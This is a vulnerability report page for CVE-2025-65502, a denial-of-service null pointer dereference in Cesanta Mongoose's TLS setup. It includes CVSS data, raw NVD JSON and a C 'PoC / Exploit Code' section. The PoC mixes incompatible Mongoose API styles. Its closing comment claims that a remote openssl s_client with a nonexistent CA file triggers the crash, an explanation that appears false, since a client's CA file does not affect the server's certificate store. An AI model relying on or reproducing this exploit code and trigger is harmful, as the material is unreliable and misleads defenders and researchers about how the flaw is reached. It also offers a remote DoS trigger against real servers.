Security Vulnerability Report
CVE-2025-65502 CVSS 4.3 MEDIUM

Published: 2025-11-24 14:15:48
Last Modified: 2025-12-12 13:32:49

Description

Null pointer dereference in add_ca_certs() in Cesanta Mongoose before 7.2 allows remote attackers to cause a denial of service via TLS initialization where SSL_CTX_get_cert_store() returns NULL.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:cesanta:mongoose:*:*:*:*:*:*:*:* - VULNERABLE
Cesanta Mongoose < 7.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2025-65502 PoC - Null Pointer Dereference in add_ca_certs()
// This PoC demonstrates triggering the NULL pointer dereference by causing
// SSL_CTX_get_cert_store() to return NULL during TLS initialization
#include <mongoose.h>
#include <stdio.h>
#include <string.h>

static void ev_handler(struct mg_connection *nc, int ev, void *ev_data) {
  (void) ev_data;  // Unused in this handler
  switch (ev) {
    case MG_EV_ACCEPT: {
      // Trigger TLS initialization with problematic cert store
      struct mg_tls_opts opts = {
        .ca = "invalid_path_to_ca_cert",  // Invalid path causes initialization failure
        .cert = "server.crt",
        .key = "server.key"
      };
      mg_tls_init(nc, &opts);
      break;
    }
    case MG_EV_CLOSE:
      break;
  }
}

int main(void) {
  struct mg_mgr mgr;
  struct mg_connection *nc;

  mg_mgr_init(&mgr, NULL);

  // Listen on port 8443 with TLS enabled
  nc = mg_bind(&mgr, "8443", ev_handler);
  if (nc == NULL) {
    printf("Failed to bind to port\n");
    return 1;
  }

  // Set TLS listening options
  nc->listener = 1;
  printf("Server started on port 8443\n");

  // The vulnerability is triggered when:
  // 1. SSL_CTX_get_cert_store() returns NULL
  // 2. add_ca_certs() tries to use this NULL pointer
  // 3. This causes a null pointer dereference -> DoS
  while (1) {
    mg_mgr_poll(&mgr, 1000);
  }

  mg_mgr_free(&mgr);
  return 0;
}

// To trigger the vulnerability remotely:
// openssl s_client -connect target:8443 -CAfile /nonexistent/path
// This will cause SSL_CTX_get_cert_store() to return NULL during TLS handshake

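References

https://github.com/cesanta/mongoose/issues/3306 (Exploit, Issue Tracking)
https://github.com/cesanta/mongoose/pull/3307 (Issue Tracking, Patch)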

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65502", "sourceIdentifier": "[email protected]", "published": "2025-11-24T14:15:48.100", "lastModified": "2025-12-12T13:32:49.247", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Null pointer dereference in add_ca_certs() in Cesanta Mongoose before 7.2 allows remote attackers to cause a denial of service via TLS initialization where SSL_CTX_get_cert_store() returns NULL."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cesanta:mongoose:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.2", "matchCriteriaId": "4B1A701D-3552-461A-8BFC-D0CF63242D2A"}]}]}], "references": [{"url": "https://github.com/cesanta/mongoose/issues/3306", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/cesanta/mongoose/pull/3307", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}]}}